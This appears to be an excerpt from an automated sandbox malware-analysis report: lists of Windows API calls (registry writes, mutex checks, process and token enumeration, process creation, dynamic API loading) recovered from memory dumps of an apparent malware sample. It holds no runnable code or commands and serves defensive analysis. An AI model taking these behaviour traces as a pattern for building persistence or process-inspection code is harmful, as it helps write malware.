    • GetProcessHeap.KERNEL32(00000008,00000006), ref: 004071E8
    • HeapAlloc.KERNEL32(00000000), ref: 004071EF
    • GetCurrentProcessId.KERNEL32 ref: 00407203
    • wsprintfA.USER32 ref: 0040723A
    • RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 00407253
    • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000004,00000000,00000004), ref: 00407272
    • RegCloseKey.ADVAPI32(00000000), ref: 0040727B
    • Sleep.KERNEL32(000003E8), ref: 0040728C
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,001CFDA8), ref: 0040A845
    • HeapAlloc.KERNEL32(00000000), ref: 0040A84C
    • GetMessageExtraInfo.USER32 ref: 0040A868
    • GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040A8CF
    • HeapAlloc.KERNEL32(00000000), ref: 0040A8D6
    • GetDoubleClickTime.USER32 ref: 0040A8EA
    • LoadLibraryA.KERNEL32(?), ref: 0040A914
    • GetProcAddress.KERNEL32(00000000), ref: 0040A91B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A94F
    • HeapFree.KERNEL32(00000000), ref: 0040A95C
    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040A961
    • HeapFree.KERNEL32(00000000), ref: 0040A968
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0040A50C
    • HeapAlloc.KERNEL32(00000000), ref: 0040A50F
    • GetMessagePos.USER32 ref: 0040A52A
    • GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040A593
    • HeapAlloc.KERNEL32(00000000), ref: 0040A596
    • GetCurrentThreadId.KERNEL32 ref: 0040A5AA
    • LoadLibraryA.KERNEL32(?), ref: 0040A5D4
    • GetProcAddress.KERNEL32(00000000), ref: 0040A5DB
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A5EF
    • HeapFree.KERNEL32(00000000), ref: 0040A5F2
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A614
    • HeapFree.KERNEL32(00000000), ref: 0040A617
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
    • HeapAlloc.KERNEL32(00000000), ref: 0040F611
    • GetShellWindow.USER32 ref: 0040F62D
    • GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
    • HeapAlloc.KERNEL32(00000000), ref: 0040F67B
    • GetLogicalDrives.KERNEL32 ref: 0040F68F
    • GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
    • GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
    • HeapFree.KERNEL32(00000000), ref: 0040F6DD
    • GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
    • HeapFree.KERNEL32(00000000), ref: 0040F6E9
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000029), ref: 00403209
    • HeapAlloc.KERNEL32(00000000), ref: 00403210
    • GetCapture.USER32 ref: 0040321F
    • HeapFree.KERNEL32(00000000), ref: 004032F0
      • Part of subcall function 0040B964: Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,00412000,00000000,00000000,?,?,?,0040329E), ref: 0040B9AC
    • Sleep.KERNEL32(-0000EA60), ref: 004032C2
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004032E9
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000089), ref: 004068BE
    • HeapAlloc.KERNEL32(00000000), ref: 004068C5
    • CountClipboardFormats.USER32 ref: 004068D6
    • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040690F
    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00406934
    • CloseHandle.KERNEL32(00000000), ref: 00406943
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040694E
    • HeapFree.KERNEL32(00000000), ref: 00406955
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,001CFDA8), ref: 004073EF
    • HeapAlloc.KERNEL32(00000000), ref: 004073F2
    • GetLogicalDrives.KERNEL32 ref: 00407406
    • GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00407460
    • HeapAlloc.KERNEL32(00000000), ref: 00407463
    • IsSystemResumeAutomatic.KERNEL32 ref: 00407477
    • GetModuleHandleA.KERNEL32(00000000,?), ref: 004074A8
    • GetProcAddress.KERNEL32(00000000), ref: 004074AF
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004074BE
    • HeapFree.KERNEL32(00000000), ref: 004074C7
    • GetProcessHeap.KERNEL32(00000000,?), ref: 004074CC
    • HeapFree.KERNEL32(00000000), ref: 004074CF
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0040EF0F
    • HeapAlloc.KERNEL32(00000000), ref: 0040EF12
    • GetForegroundWindow.USER32 ref: 0040EF23
    • OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0040EF58
    • CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0040EF6B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EF73
    • HeapFree.KERNEL32(00000000), ref: 0040EF76
    • ExitProcess.KERNEL32 ref: 0040EF84
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0040107A
      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040107D
      • Part of subcall function 00401000: wsprintfW.USER32 ref: 00401093
      • Part of subcall function 00401000: lstrlenW.KERNEL32(00000000), ref: 004010A7
      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,00000000), ref: 004010B7
      • Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 004010BA
      • Part of subcall function 00401000: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004010D1
      • Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004010F4
      • Part of subcall function 00401000: HeapFree.KERNEL32(00000000), ref: 004010FB
    • StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401992), ref: 0040158B
    • GetProcessHeap.KERNEL32(00000008,00000015), ref: 004015D6
    • HeapAlloc.KERNEL32(00000000), ref: 004015D9
    • GetClipboardViewer.USER32 ref: 004015E8
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401639
    • HeapFree.KERNEL32(00000000), ref: 0040163C
      • Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
      • Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
      • Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
      • Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
      • Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
      • Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
      • Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
      • Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0
    • HeapFree.KERNEL32(00000000), ref: 0040167D
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00401176
      • Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401179
      • Part of subcall function 0040110C: CountClipboardFormats.USER32 ref: 0040119F
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,000000C1), ref: 004012C8
      • Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 004012CB
      • Part of subcall function 0040110C: GetDialogBaseUnits.USER32 ref: 004012EA
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00401356
      • Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401359
      • Part of subcall function 0040110C: GetDialogBaseUnits.USER32 ref: 00401372
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000019), ref: 004013C4
      • Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 004013C7
      • Part of subcall function 0040110C: GetCurrentThreadId.KERNEL32 ref: 004013E0
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000025), ref: 0040143F
      • Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401442
      • Part of subcall function 0040110C: ReleaseCapture.USER32 ref: 00401458
      • Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0040149A
      • Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 004014CE
      • Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00401500
      • Part of subcall function 0040110C: RegCloseKey.ADVAPI32(00000006), ref: 00401505
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401515
      • Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 0040151E
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00401524
      • Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401527
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,?), ref: 0040152D
      • Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401530
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00401542
      • Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 0040154B
      • Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,?), ref: 00401551
      • Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401554
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040166C
    • HeapFree.KERNEL32(00000000), ref: 0040166F
    • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00401992), ref: 0040167A
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,00435AE2,00000104,00000001,00000000,00000000), ref: 004208C0
      • Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
      • Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641
    • _wcslen.LIBCMT ref: 004208EF
    • _wcslen.LIBCMT ref: 004208FC
      • Part of subcall function 00424851: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042488C
      • Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004248A8
      • Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248B9
      • Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004248C6
      • Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248C9
      • Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004248D6
      • Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248D9
      • Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 004248E6
      • Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248E9
      • Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004248FA
      • Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248FD
      • Part of subcall function 00424851: DecodePointer.KERNEL32(00000000,00435AB0,00000314,00000000), ref: 0042491F
      • Part of subcall function 00424851: DecodePointer.KERNEL32 ref: 00424929
      • Part of subcall function 00424851: DecodePointer.KERNEL32(?,00435AB0,00000314,00000000), ref: 00424968
      • Part of subcall function 00424851: DecodePointer.KERNEL32(?), ref: 00424982
      • Part of subcall function 00424851: DecodePointer.KERNEL32(00435AB0,00000314,00000000), ref: 00424996
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,00000000), ref: 00420972
    • _strlen.LIBCMT ref: 004209AF
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004209BE
      • Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
      • Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
      • Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
      • Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
      • Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
    • Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
    • Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
    • Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
    • Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
    • Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_1_400000_484.jbxd
    APIs
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
      • Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F611
      • Part of subcall function 0040F5D9: GetShellWindow.USER32 ref: 0040F62D
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
      • Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F67B
      • Part of subcall function 0040F5D9: GetLogicalDrives.KERNEL32 ref: 0040F68F
      • Part of subcall function 0040F5D9: GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
      • Part of subcall function 0040F5D9: GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
      • Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6DD
      • Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
      • Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6E9
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0041CD20), ref: 0040BB67
      • Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB70
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB86
      • Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB89
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB9D
      • Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BBA0
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040BBE4
      • Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000), ref: 0040BBE7
      • Part of subcall function 0040BB40: ReleaseCapture.USER32 ref: 0040BBF9
      • Part of subcall function 0040BB40: GetSystemDirectoryW.KERNEL32(0041CD24,00000103), ref: 0040BC4D
      • Part of subcall function 0040BB40: lstrcatW.KERNEL32(0041CD24,00000000), ref: 0040BC84
      • Part of subcall function 0040BB40: FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BC8E
      • Part of subcall function 0040BB40: StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0040BCD3
      • Part of subcall function 0040BB40: FindNextFileW.KERNEL32(?,?), ref: 0040BD84
      • Part of subcall function 0040BB40: FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BD90
      • Part of subcall function 0040BB40: FindClose.KERNEL32(?), ref: 0040BDC4
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040BDDB
      • Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDDE
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BDE8
      • Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDEB
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,0041CD24,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BDFA
      • Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDFD
      • Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BE07
      • Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BE0A
    • GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF97
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF9A
    • GetFocus.USER32 ref: 0040BFAB
    • lstrcatW.KERNEL32(00000000), ref: 0040BFDE
    • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C012
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C042
    • HeapFree.KERNEL32(00000000), ref: 0040C045
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • FindAtomW.KERNEL32(?), ref: 00406F8C
    • AddAtomW.KERNEL32(?), ref: 00406FA2
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00406FAC
    • HeapAlloc.KERNEL32(00000000), ref: 00406FB3
    • OpenProcess.KERNEL32(00100410,00000000,?), ref: 0040701E
    • GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 00407037
    • CloseHandle.KERNEL32(00000000), ref: 0040703E
    • lstrlenA.KERNEL32(?), ref: 00407051
    • lstrlenA.KERNEL32(?), ref: 0040705E
      • Part of subcall function 0040E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
      • Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
      • Part of subcall function 0040E545: HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
      • Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
      • Part of subcall function 0040E545: HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0
      • Part of subcall function 00404AB4: OpenProcess.KERNEL32(00000400,00000000), ref: 00404AFF
      • Part of subcall function 00404AB4: GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00404B21
      • Part of subcall function 00404AB4: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404B58
      • Part of subcall function 00404AB4: HeapAlloc.KERNEL32(00000000), ref: 00404B5F
      • Part of subcall function 00404AB4: GetForegroundWindow.USER32 ref: 00404B70
      • Part of subcall function 00404AB4: wsprintfA.USER32 ref: 00404BAD
      • Part of subcall function 00404AB4: FindAtomA.KERNEL32(?), ref: 00404BBD
      • Part of subcall function 00404AB4: GlobalFindAtomA.KERNEL32(?), ref: 00404BD2
      • Part of subcall function 00404AB4: GlobalAddAtomA.KERNEL32(?), ref: 00404BE4
      • Part of subcall function 00404AB4: AddAtomA.KERNEL32(?), ref: 00404BF1
      • Part of subcall function 00404AB4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BFD
      • Part of subcall function 00404AB4: HeapFree.KERNEL32(00000000), ref: 00404C04
      • Part of subcall function 00404AB4: CloseHandle.KERNEL32(?), ref: 00404C0D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
      • Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
      • Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
      • Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
      • Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
      • Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
      • Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
      • Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
      • Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
      • Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
      • Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
      • Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
      • Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6
    • StrCmpIW.SHLWAPI(?,0041CAB0), ref: 004070AB
    • CreateThread.KERNEL32(00000000,00000000,Function_00004D73,?,00000000,00000000), ref: 004070BF
    • CloseHandle.KERNEL32(00000000), ref: 004070C6
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0040A6B0
      • Part of subcall function 0040A626: HeapAlloc.KERNEL32(00000000), ref: 0040A6B3
      • Part of subcall function 0040A626: GetCurrentThreadId.KERNEL32 ref: 0040A6C5
      • Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0040A717
      • Part of subcall function 0040A626: HeapAlloc.KERNEL32(00000000), ref: 0040A71A
      • Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A766
      • Part of subcall function 0040A626: HeapFree.KERNEL32(00000000), ref: 0040A76D
    • GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0040107A
    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040107D
    • wsprintfW.USER32 ref: 00401093
    • lstrlenW.KERNEL32(00000000), ref: 004010A7
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004010B7
    • HeapAlloc.KERNEL32(00000000), ref: 004010BA
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004010D1
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004010F4
    • HeapFree.KERNEL32(00000000), ref: 004010FB
    Strings
    • [Version]signature = "$CHICAGO$"AdvancedINF = 2.5, "You need a new version of advpack.dll"[DefaultInstall]RunPreSetupCom, xrefs: 0040108A
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
    • HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
    • GetFocus.USER32 ref: 0040BE7C
    • GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
    • lstrlenA.KERNEL32(?), ref: 0040BEC9
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
    • HeapFree.KERNEL32(00000000), ref: 0040BEF1
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_484.jbxd
    APIs
      • Part of subcall function 00421381: GetLastError.KERNEL32(00000000,?,00423589,00424BAC,?,0042085F,00000003), ref: 00421385
      • Part of subcall function 00421381: RtlDecodePointer.NTDLL(00000000), ref: 004213C1
      • Part of subcall function 00421381: GetCurrentThreadId.KERNEL32(?,0042085F,00000003), ref: 004213D7
      • Part of subcall function 00421381: SetLastError.KERNEL32(00000000,?,0042085F,00000003), ref: 004213EF
    • _siglookup.LIBCMT ref: 004240A5
